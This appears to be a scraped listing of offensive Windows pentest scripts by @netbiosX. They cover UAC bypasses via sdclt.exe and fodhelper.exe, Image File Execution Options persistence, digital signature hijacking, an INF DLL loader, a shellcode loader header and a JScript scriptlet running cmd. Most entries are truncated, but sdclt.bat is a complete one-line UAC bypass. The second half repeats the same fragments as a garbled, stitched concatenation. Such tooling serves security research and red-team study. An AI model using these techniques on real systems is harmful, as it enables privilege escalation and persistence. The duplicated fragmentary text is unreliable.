netbiosX netbiosX

## userAccountControl.ps1
function Execute-userAccountControl
{
[CmdletBinding()]
        param
        (
                [System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
                [System.String]$ComputerName = 'Pentestlab',
                [System.String]$OSVersion = '10.0 (18363)',
                [System.String]$OS = 'Windows 10 Enterprise',
                [System.String]$DNSName = "$ComputerName.$DomainFQDN",

## ImageFileExecutionOptions.ps1
<#
    ImageFileExecutionOptions v1.0
    License: GPLv3
    Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/

function Persist-Debugger

## pentestlab-dll.inf
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection

[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll

## DigitalSignature-Hijack.ps1
<#
    DigitalSignatureHijack v1.0
    License: GPLv3
    Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts

function ValidateSignaturePS
{
	$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'

## customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
   <customer>
      <name>Microsoft</name>
   </customer>
</customers>

## Sdclt.ps1
<#
.SYNOPSIS
    This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.

    Author: @netbiosX
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

    It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass

## sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

## FodhelperUACBypass.ps1
<#
.SYNOPSIS
    This script can bypass User Access Control (UAC) via fodhelper.exe

    It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
    an elevated command prompt.

.NOTES
    Function   : FodhelperUACBypass
    File Name  : FodhelperUACBypass.ps1

## Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

## pentestlab.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Pentest"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - @netbiosX -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");
	function Execute-userAccountControl
	{
	[CmdletBinding()]
	param
	(
	[System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
	[System.String]$ComputerName = 'Pentestlab',
	[System.String]$OSVersion = '10.0 (18363)',
	[System.String]$OS = 'Windows 10 Enterprise',
	[System.String]$DNSName = "$ComputerName.$DomainFQDN",
	<#
	ImageFileExecutionOptions v1.0
	License: GPLv3
	Author: @netbiosX
	#>
	# Image File Execution Options Injection Persistence Technique
	# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/

	function Persist-Debugger
	[version]
	Signature=$chicago$
	AdvancedINF=2.5

	[DefaultInstall_SingleUser]
	RegisterOCXs=RegisterOCXSection

	[RegisterOCXSection]
	C:\Users\test.PENTESTLAB\pentestlab.dll
	<#
	DigitalSignatureHijack v1.0
	License: GPLv3
	Author: @netbiosX
	#>
	# Validate Digital Signature for PowerShell Scripts

	function ValidateSignaturePS
	{
	$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
	<?xml version="1.0"?>
	<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
	<customers>
	<customer>
	<name>Microsoft</name>
	</customer>
	</customers>
	<#
	.SYNOPSIS
	This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.

	Author: @netbiosX
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None

	It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
	<#
	.SYNOPSIS
	This script can bypass User Access Control (UAC) via fodhelper.exe

	It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
	an elevated command prompt.

	.NOTES
	Function : FodhelperUACBypass
	File Name : FodhelperUACBypass.ps1
	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="Pentest"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - @netbiosX -->
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");